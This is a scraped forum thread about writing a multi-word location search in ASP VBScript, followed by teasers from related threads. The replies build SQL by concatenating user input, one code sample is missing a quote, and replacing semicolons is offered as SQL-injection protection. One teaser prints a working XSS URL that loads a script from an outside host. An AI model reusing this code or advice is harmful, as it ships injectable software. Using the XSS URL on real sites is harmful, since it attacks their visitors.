i have a database as
table name school
field name location
eg in location column data
green school,tagore garden,chink road,jammu
i want to make search on location such that when user enter
green
green school, tagore
search words should come continous
problem
on entering
green school, jammu
record not show
search query is
select*from school where location like'%a%'
where a is variable of text box
also suggest me to protect this text box against sequel injection
4 3378 @kkshansid
In ASP Vbscript , when u r comparing form variables in sql statements, use within quotes as shown below :
sql = "select * from school where location like '%"&a&"%'"
then execute this statement
Regards,
"D"
eg in location column data
green school,tagore garden,chink road,jammu
i want to make search on location such that when user enter
green
green school, tagore
broblem is that it takes condition that search words should come continous
problem
on entering
green school, jammu
record not show
search query is
sql = "select * from school where location like '%"&a&"%'"
where a is variable of text box
jhardman 3,406
Recognized Expert Specialist @kkshansid
It looks like your grasp of ASP is OK, but the SQL needs to be more complicated. Try splitting the entered data by the space character, and enter each term separately into the sql like this: - asplit = split(a, " ") 'asplit is now an array of the terms in a
-
sql = "SELECT * FROM school WHERE "
-
for each x in asplit
-
sql = sql + "location LIKE '%" & x & "% AND "
-
next
-
-
'sql now ends with "AND " and this needs to be removed
-
sql = left(sql, len(sql)-4) 'removes the last 4 characters from the string
Try this and let me know if it works.
Jared
jhardman 3,406
Recognized Expert Specialist @kkshansid
In order to protect against SQL injection, you will need to search and replace special characters in your text - the first one that comes to mind is the semi-colon (;) since you need to separate sql statements with the semicolon. There are a whole bunch of characters it would be good to replace, some people have lists, anyway, the basic replace function looks like this: - searchString = Replace(a, ";", "|")
Jared
Sign in to post your reply or Sign up for a free account.
Similar topics |
by: Doc |
last post by:
I keep reading about various websites being hacked into and wonder, how is
this done? Not for any nefarious reasons, but to take measures to protect
mine. Apparently this has been done to some high profile sites that you
would think would have good security in place. In fact, if memory serves,
wasn't one of Microsoft's site hacked?
Since you have to put in a password to get into the server, obviously
there's some other way to do it. How...
|
by: mp |
last post by:
Hi,
MS Access DB, C#, VS, SQL
I have implemented search with SQL statements like follows:
SQLString = "SELECT ENGLISH FROM MyTable WHERE ENGLISH LIKE
'"+txtWordManipulation.Text+"%' ORDER BY ENGLISH";
end everything is desperately slow. DB is more than 150k words and I haven't
defined primary key because indexed option is set on Yes (Duplicates OK).
|
by: ime |
last post by:
Hi to all.
I'm making a web application in which users enter text
for a person's name, last name, sex, etc.
But user doesn't have to populate all text boxes, so I don't know how to
make query without these conditions (for example if I have an empty string
for a name) .
I've got 9 text boxes, so I can't write all combinations - it's to many of
them.
Thanks a lot
|
by: Zeya |
last post by:
I have an application where I am required to run a full text query. My
database is MySQL and code in C#. The way all queries are SELECT * FROM
table WHERE firstname = ? and using command parameter the value of ? is
added. But, how would I do the same in case of full text search.
SELECT *, ROUND( MATCH(title, comments) AGAINST (? IN BOOLEAN MODE ) *
10, 2 ) AS score FROM table WHERE MATCH(title,comments) AGAINST (? IN
|
by: mantrid |
last post by:
Up to the other day I have not bothered protecting my php script on my
feedback form against email injection. Howerver, i have had a spammer using
it to insert email addresses as cc: bc: into my email field. First I was
puzzled why he was doing it as the message being sent was just jibberish. I
have recently used a function to protect these fields and send an email back
to myself with his details. function below
function...
| |
by: |
last post by:
I have a question about spawning and displaying subordinate list controls
within a list control. I'm also interested in feedback about the design of
my search application. Lots of code is at the end of this message, but I
will start with an overview of the problem.
I've made a content management solution for my work with a decently
structured relational database system. The CMS stores articles. The CMS also
stores related items --...
|
by: helraizer1 |
last post by:
Hi all,
I've noticed on my friend's site www.sheepeep.com/index.php?p=1 that is easy to manipulate with XSS, I don't mean it in a malicious way at all, just to give an idea as to what people can do.
As an example of such http://www.sheepeep.com/index.php?p=2'%22%3E%3Cscript%20type='text/javascript'%20src='http://www.helraizer.co.uk/mychatbox/xss.js'%3E%3C/script%3E
With PHP (or any other language, come to that) how would one protect...
|
by: mbenedict |
last post by:
I am rather new at this code and am attempting to modify existing code to use clob datatypes, which I have never used before. The database tables have been set up for clob data. When trying to use dbms_lob.writeappend, I am getting the following error..Command text was not set for the command object.
I've researched this in the net as much as I could, but I'm lost in what I am doing wrong. Can you help please?
Here is my code...
...
|
by: iahamed |
last post by:
Hi Everyone,
I got two parts of my advance search to work, I am running out of Logic to
connect the third. My mind is in swing! Pleaseeeeeeeee Help me.
I have 3 Fiels to search, the First two works, thats:
1. Category to search from the (Drop down name: ASPDBCatSearch) is working
with the Input Text Box Field (name: keyword), based on Whatever selection on
the Drop down value selection:
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look !
Part I. Meaning of...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it.
First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
| |
by: tracyyun |
last post by:
Dear forum friends,
With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one.
At the time of converting from word file to html my equations which are in the word document file was convert into image.
Globals.ThisAddIn.Application.ActiveDocument.Select();...
|
by: TSSRALBI |
last post by:
Hello
I'm a network technician in training and I need your help.
I am currently learning how to create and manage the different types of VPNs and I have a question about LAN-to-LAN VPNs.
The last exercise I practiced was to create a LAN-to-LAN VPN between two Pfsense firewalls, by using IPSEC protocols.
I succeeded, with both firewalls in the same network. But I'm wondering if it's possible to do the same thing, with 2 Pfsense firewalls...
|
by: adsilva |
last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
|
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| |